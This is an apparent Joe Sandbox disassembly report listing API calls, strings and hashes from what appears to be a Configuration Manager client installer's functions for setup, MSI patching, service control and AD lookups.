                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pSubnetInfo) != 0$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$0 != pdwLen$0 != ppInfo$CcmUtilLib::CcmGetIPAddressInformation$Failed to retrieve IP subnet information (0x%08x).$Failed to retrieve IPV6 address information.$GetIPV4AddressInformation(vecIPV4Info)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060116A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006011BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060121B
                                                                                          • CoTaskMemAlloc.OLE32(00000000,00000017,?,?,CCM::Utility::ComString::assign,00000018,00674E15,?,00000000,000000FF), ref: 00601258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00601291
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006012F6
                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000017,?,00000000,00000000,00000200), ref: 00601336
                                                                                          Strings
                                                                                          • pos >= 0, xrefs: 00601211
                                                                                          • ..\ComString.cpp, xrefs: 00601227
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00601216
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060128C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006012F1
                                                                                          • pszUnicodeValue != 0, xrefs: 006011B3
                                                                                          • ..\ComString.cpp, xrefs: 006011C9
                                                                                          • ..\ComString.cpp, xrefs: 0060129D
                                                                                          • ..\ComString.cpp, xrefs: 0060120B
                                                                                          • StringCchCatNExW( pszNewValue, uLength + 1, pszUnicodeValue + pos, uLength, 0, 0, 0x00000200 ), xrefs: 006012EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006011B8
                                                                                          • ..\ComString.cpp, xrefs: 00601302
                                                                                          • ..\ComString.cpp, xrefs: 006011AD
                                                                                          • ..\ComString.cpp, xrefs: 00601281
                                                                                          • ..\ComString.cpp, xrefs: 006012E6
                                                                                          • CCM::Utility::ComString::assign, xrefs: 0060117A
                                                                                          • (pszNewValue != 0) != 0, xrefs: 00601287
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Task$AllocFreeH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pszNewValue != 0) != 0$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$CCM::Utility::ComString::assign$StringCchCatNExW( pszNewValue, uLength + 1, pszUnicodeValue + pos, uLength, 0, 0, 0x00000200 )$pos >= 0$pszUnicodeValue != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00641226
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • CoCreateInstance.OLE32(008DCE4C,00000000,00000017,00841544,?,00000000,000000FF,00000000,000000FF,00000000,000000FF,00000000,000000FF,CCM::LocationServices::LSGetADForestAndDomainName,00000034,00650D74), ref: 00641319
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00641349
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00641380
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006413BE
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006413D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00641419
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ..\lsad.cpp, xrefs: 00641339
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00641414
                                                                                          • spSystemInfo->get_ForestDNSName(&bstrForestName), xrefs: 006413B4
                                                                                          • ..\lsad.cpp, xrefs: 00641409
                                                                                          • spSystemInfo.CoCreateInstance( CLSID_ADSystemInfo ), xrefs: 0064133F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00641344
                                                                                          • LSGetADForestAndDomainName, xrefs: 006412A5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006413B9
                                                                                          • CCM::LocationServices::LSGetADForestAndDomainName, xrefs: 00641269
                                                                                          • ..\lsad.cpp, xrefs: 00641425
                                                                                          • ..\lsad.cpp, xrefs: 006413CA
                                                                                          • spSystemInfo->get_DomainDNSName(&bstrDomainName), xrefs: 0064140F
                                                                                          • Unable to retrieve AD forest + domain membership. Error 0x%x, xrefs: 006414F4
                                                                                          • Current AD forest name is %s, domain name is %s, xrefs: 0064153B
                                                                                          • ..\lsad.cpp, xrefs: 006413AE
                                                                                          • ..\lsad.cpp, xrefs: 00641355
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$CreateH_prolog3H_prolog3_catchInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetADForestAndDomainName$Current AD forest name is %s, domain name is %s$LSGetADForestAndDomainName$Unable to retrieve AD forest + domain membership. Error 0x%x$spSystemInfo->get_DomainDNSName(&bstrDomainName)$spSystemInfo->get_ForestDNSName(&bstrForestName)$spSystemInfo.CoCreateInstance( CLSID_ADSystemInfo )
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057A127
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 00587525: __EH_prolog3_catch_GS.LIBCMT ref: 0058752C
                                                                                            • Part of subcall function 00587525: GetCurrentThreadId.KERNEL32 ref: 005875C1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A1EA
                                                                                            • Part of subcall function 00597526: __EH_prolog3_catch_GS.LIBCMT ref: 00597530
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A29D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A2F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A34F
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A1E5
                                                                                          • DetermineApplicablePatches(sCachedMsi, m_sWorkingProductCode), xrefs: 0057A2E6
                                                                                          • ccmsetup.cpp, xrefs: 0057A357
                                                                                          • ccmsetup.cpp, xrefs: 0057A1DA
                                                                                          • ccmsetup.cpp, xrefs: 0057A2E0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A34A
                                                                                          • PrepareMsiProperties(InstallAction_Repair, sMsiProperties, sTemp, mapTemp), xrefs: 0057A345
                                                                                          • client.msi, xrefs: 0057A21B
                                                                                          • GetPackageInfo(sCachedMsi, m_sWorkingProductCode), xrefs: 0057A293
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A298
                                                                                          • ccmsetup.cpp, xrefs: 0057A1F2
                                                                                          • ccmsetup.cpp, xrefs: 0057A33F
                                                                                          • ccmsetup.cpp, xrefs: 0057A28D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A2EB
                                                                                          • ccmsetup.cpp, xrefs: 0057A2A5
                                                                                          • ccmsetup.cpp, xrefs: 0057A2F8
                                                                                          • GetCachedMsiPath(sPath), xrefs: 0057A1E0
                                                                                          • CcmSetup::ApplyDeltaPatchChanges, xrefs: 0057A18D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ApplyDeltaPatchChanges$DetermineApplicablePatches(sCachedMsi, m_sWorkingProductCode)$GetCachedMsiPath(sPath)$GetPackageInfo(sCachedMsi, m_sWorkingProductCode)$PrepareMsiProperties(InstallAction_Repair, sMsiProperties, sTemp, mapTemp)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061921D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00619291
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006192F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061934D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061939B
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$CCM::Utility::CommandLine::SetCommandLine$ProcessCommandLine(sCmd)$Set command line: %s$pszCommandLine != 0$pszCommandLine[0] != 0$sCmd.empty() == false
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00656154
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006561B6
                                                                                            • Part of subcall function 00611906: __EH_prolog3_catch.LIBCMT ref: 0061190D
                                                                                            • Part of subcall function 00611906: GetCurrentThreadId.KERNEL32 ref: 0061197C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656219
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656289
                                                                                          Strings
                                                                                          • CCMGetCertificateContextWrapperEx - function called while in provisioning mode., xrefs: 00656240
                                                                                          • false == bProvMode, xrefs: 0065620F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00656214
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656291
                                                                                          • CCM::Authentication::CCMGetCertificateContextWrapperEx, xrefs: 00656170
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx1(ppCertContext, bOuterCert), xrefs: 0065627F
                                                                                          • HRESULT, xrefs: 006562CF
                                                                                          • CCM_ServiceHost_CertRetrieval_Status, xrefs: 006562D4
                                                                                          • HRESULT, xrefs: 006562F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00656284
                                                                                          • 0 != ppCertContext, xrefs: 006561AC
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656279
                                                                                          • ..\ccmgencert.cpp, xrefs: 006561A6
                                                                                          • CCM_ServiceHost_CertRetrieval_Status, xrefs: 006562F7
                                                                                          • ..\ccmgencert.cpp, xrefs: 006561BE
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656221
                                                                                          • 0x%08x, xrefs: 006562A0
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656209
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006561B1
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$0 != ppCertContext$0x%08x$CCM::Authentication::CCMGetCertificateContextWrapperEx$CCMGetCertificateContextWrapperEx - function called while in provisioning mode.$CCM_ServiceHost_CertRetrieval_Status$CCM_ServiceHost_CertRetrieval_Status$CcmUtilLib::CcmGetCertificateContextEx1(ppCertContext, bOuterCert)$HRESULT$HRESULT$false == bProvMode
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00604223
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00604279
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006042D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00604317
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006043CE
                                                                                            • Part of subcall function 0066DD95: __make__time64_t.LIBCMT ref: 0066DD9D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060440D
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catch_Throw__make__time64_t
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$CCM::Utility::Time::Time$m_time != -1$nDay >= 1 && nDay <= 31$nMonth >= 1 && nMonth <= 12$nYear >= 1900
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00610141
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610197
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006101FD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061023D
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000008,00000000), ref: 00610258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610291
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ArrayElementH_prolog3_catchSafe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$CCM::Utility::SafeArray::getBstr$SafeArrayGetElement(m_psaArray, &lIndex, pbstrVal)$getType() == VT_BSTR$m_psaArray != 0$pbstrVal != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006102F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061034C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006103B2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006103F2
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000008,00000000), ref: 0061040D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610446
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ArrayElementH_prolog3_catchSafe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$CCM::Utility::SafeArray::getUnknown$SafeArrayGetElement(m_psaArray, &lIndex, ppUnk)$getType() == VT_UNKNOWN$m_psaArray != 0$ppUnk != 0
                                                                                          • API String ID: 997265480-3444498637
                                                                                          • Opcode ID: aa8d10f7c388925fb84dc5cffc2df8a85bb0fcc9ce465773467bc5f1f6e4856e
                                                                                          • Instruction ID: 74c3583a455a3b900e7739305c03a2f0a7606d8eb097b2cfba8fce5364c14810
                                                                                          • Opcode Fuzzy Hash: aa8d10f7c388925fb84dc5cffc2df8a85bb0fcc9ce465773467bc5f1f6e4856e
                                                                                          • Instruction Fuzzy Hash: 8531E3B1680346FBEF21AF908D0AFEE7A65AB50F10F588009BD55B72C1C6F94A818661
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AF06A
                                                                                            • Part of subcall function 005AB6BC: __EH_prolog3.LIBCMT ref: 005AB6C3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AF186
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AF3BC
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AF3C4
                                                                                          • Running installation package Package: %s Log: %s Properties: %s, xrefs: 005AF20A
                                                                                          • File %s installation succeeded. Windows Installer has requested a reboot., xrefs: 005AF4A2
                                                                                          • .MSP, xrefs: 005AF299
                                                                                          • File %s installation succeeded., xrefs: 005AF5EA
                                                                                          • msiutil.cpp, xrefs: 005AF176
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AF3B7
                                                                                          • uError, xrefs: 005AF3B2
                                                                                          • MsiEnableLogW( dwMsiLogOptions, sLogFile, 0 ), xrefs: 005AF17C
                                                                                          • InstallPackage, xrefs: 005AF0AE
                                                                                          • msiutil.cpp, xrefs: 005AF18E
                                                                                          • msiutil.cpp, xrefs: 005AF3AC
                                                                                          • ., xrefs: 005AF22B
                                                                                          • File %s installation failed. Error text: %s, xrefs: 005AF402
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AF181
                                                                                          • File %s installation failed because another program is installing (1618), xrefs: 005AF537
                                                                                          • ExitCode: %luAction: %sErrorMessages:%s, xrefs: 005AF355
                                                                                          • File %s installation succeeded. Windows Installer has initiated a reboot., xrefs: 005AF4F7
                                                                                          • File %s installation was cancelled (1602), xrefs: 005AF59E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.$.MSP$ExitCode: %luAction: %sErrorMessages:%s$File %s installation failed because another program is installing (1618)$File %s installation failed. Error text: %s$File %s installation succeeded.$File %s installation succeeded. Windows Installer has initiated a reboot.$File %s installation succeeded. Windows Installer has requested a reboot.$File %s installation was cancelled (1602)$InstallPackage$MsiEnableLogW( dwMsiLogOptions, sLogFile, 0 )$Running installation package Package: %s Log: %s Properties: %s$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp$uError
                                                                                          • API String ID: 3353525418-2638979762
                                                                                          • Opcode ID: df127409bc08f09a542d966b7a05f7923e97090ed2e7044d36918e9f1f61c777
                                                                                          • Instruction ID: b1e68e14b8bce0bd143cac143028ff21d2c4b910ce0c4d771404f40db4e17d9e
                                                                                          • Opcode Fuzzy Hash: df127409bc08f09a542d966b7a05f7923e97090ed2e7044d36918e9f1f61c777
                                                                                          • Instruction Fuzzy Hash: 21F1AF70900249EADF24DFA8CD89BEEBFB9BF56304F1040A9E54967282D7745E48CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065406C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006540EA
                                                                                            • Part of subcall function 0065431B: __EH_prolog3_catch_GS.LIBCMT ref: 00654325
                                                                                            • Part of subcall function 0065431B: WSAStartup.WS2_32(00000202,?), ref: 00654384
                                                                                            • Part of subcall function 0065431B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000001D,00000000,00000000), ref: 006543B7
                                                                                            • Part of subcall function 0065431B: inet_addr.WS2_32(?), ref: 006543DF
                                                                                            • Part of subcall function 0065431B: GetNameInfoW.WS2_32(?,00000010,?,00000401,00000000,00000000,00000004), ref: 00654406
                                                                                            • Part of subcall function 0065431B: WSAGetLastError.WS2_32 ref: 00654410
                                                                                            • Part of subcall function 0065431B: GetCurrentThreadId.KERNEL32 ref: 00654449
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00654164
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006541BC
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000000F,00000000,00000000,?,000000FE,000000FE,00000000,?,008742F8,CCM::LocationServices::LSInternalWinsResolveSMSName,00000154), ref: 006541E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharH_prolog3_catch_MultiWide$ErrorInfoLastNameStartupinet_addr
                                                                                          • String ID: $ $%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$Attempting to find '%s' with %d suffix on LANA %d from WINS$Attempting to resolve '%s' with %d suffix from WINS$CCM::LocationServices::LSInternalWinsResolveSMSName$iRet == 0x00$iRet == 0x00$szName
                                                                                          • API String ID: 1632605935-1537771779
                                                                                          • Opcode ID: d8b06fed09a23fa279d47bdb9d9fe02296fd6bbbd415605e5e5a7621a900e925
                                                                                          • Instruction ID: 5092d4d74422c38324f7bc2789127145987bc902fe13e37e93948087130e97a9
                                                                                          • Opcode Fuzzy Hash: d8b06fed09a23fa279d47bdb9d9fe02296fd6bbbd415605e5e5a7621a900e925
                                                                                          • Instruction Fuzzy Hash: B6611571944359AADF209FA48C49BFE7B79AB55309F0450D5FD4CA7382CB788E88CB60
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00608146
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006081AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608211
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608257
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006082A3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::GetDirectory$p.assign(pszFileName)$p.remove()$pszFileName != 0$pszFileName[0] != L'\0'
                                                                                          • API String ID: 3353525418-3582719604
                                                                                          • Opcode ID: d9299996fe72c2585bf5f2e621b8e8ec987a1ccb4eb4aaa9f86f4b6fbd413018
                                                                                          • Instruction ID: 3814b52b377e3dd987bf0613be7776fe875b252bce9754a20774d5e1dce9f78c
                                                                                          • Opcode Fuzzy Hash: d9299996fe72c2585bf5f2e621b8e8ec987a1ccb4eb4aaa9f86f4b6fbd413018
                                                                                          • Instruction Fuzzy Hash: 6641F4B0A80355BECB15EBA4DC4AEEFBE65AF14B50F048055F894772D2DBB84B06C750
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005BC020
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC0AA
                                                                                            • Part of subcall function 0060D19D: __EH_prolog3_catch.LIBCMT ref: 0060D1A4
                                                                                            • Part of subcall function 0060D19D: GetCurrentThreadId.KERNEL32 ref: 0060D205
                                                                                            • Part of subcall function 0060D19D: __CxxThrowException@8.LIBCMT ref: 0060D2EA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC110
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC191
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catchH_prolog3_catch_Throw
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmExec is not in running state. No need to stop.$Couldn't stop CcmExec service. Error 0x%x$StopCcmExec$X9m$ccmexec$pService = new CServiceControl(c_szCcmExecServiceName, 0x0020 | 0x0004)$pService->GetStatus(status)$pService->Stop()$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 533523981-2375669186
                                                                                          • Opcode ID: 1bd671d12fc2c85c3150ab2abeab76888c2e46aea44ef76370c89a46c639f29e
                                                                                          • Instruction ID: 7bf612d4434c6b5cecd8c5e0bf86f952e5422f1f50143aa610e1641b92a1a955
                                                                                          • Opcode Fuzzy Hash: 1bd671d12fc2c85c3150ab2abeab76888c2e46aea44ef76370c89a46c639f29e
                                                                                          • Instruction Fuzzy Hash: 4551C771E81319AAEB10EBA4C94EBEDBEA2BF44B14F144006F9007B3C2DBB45A00CB55
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005CE167
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE1E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE253
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE29F
                                                                                          Strings
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE28F
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE1D3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE29A
                                                                                          • CacheConfig.ConfigKey="Cache", xrefs: 005CE21B
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE1EB
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE25B
                                                                                          • CCopySWDSourceTask::GetCacheLocationFromWMI, xrefs: 005CE18C
                                                                                          • Location, xrefs: 005CE263
                                                                                          • spNS.Get(szCacheObject, &spCacheConfig), xrefs: 005CE249
                                                                                          • root\ccm\softmgmtagent, xrefs: 005CE1AB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE24E
                                                                                          • spCacheConfig.GetString(szLocation, sCacheLocation), xrefs: 005CE295
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE2A7
                                                                                          • Failed to get cache location from WMI. Error 0x%x, xrefs: 005CE312
                                                                                          • spNS.Open(szNamespace), xrefs: 005CE1D9
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE243
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE1DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
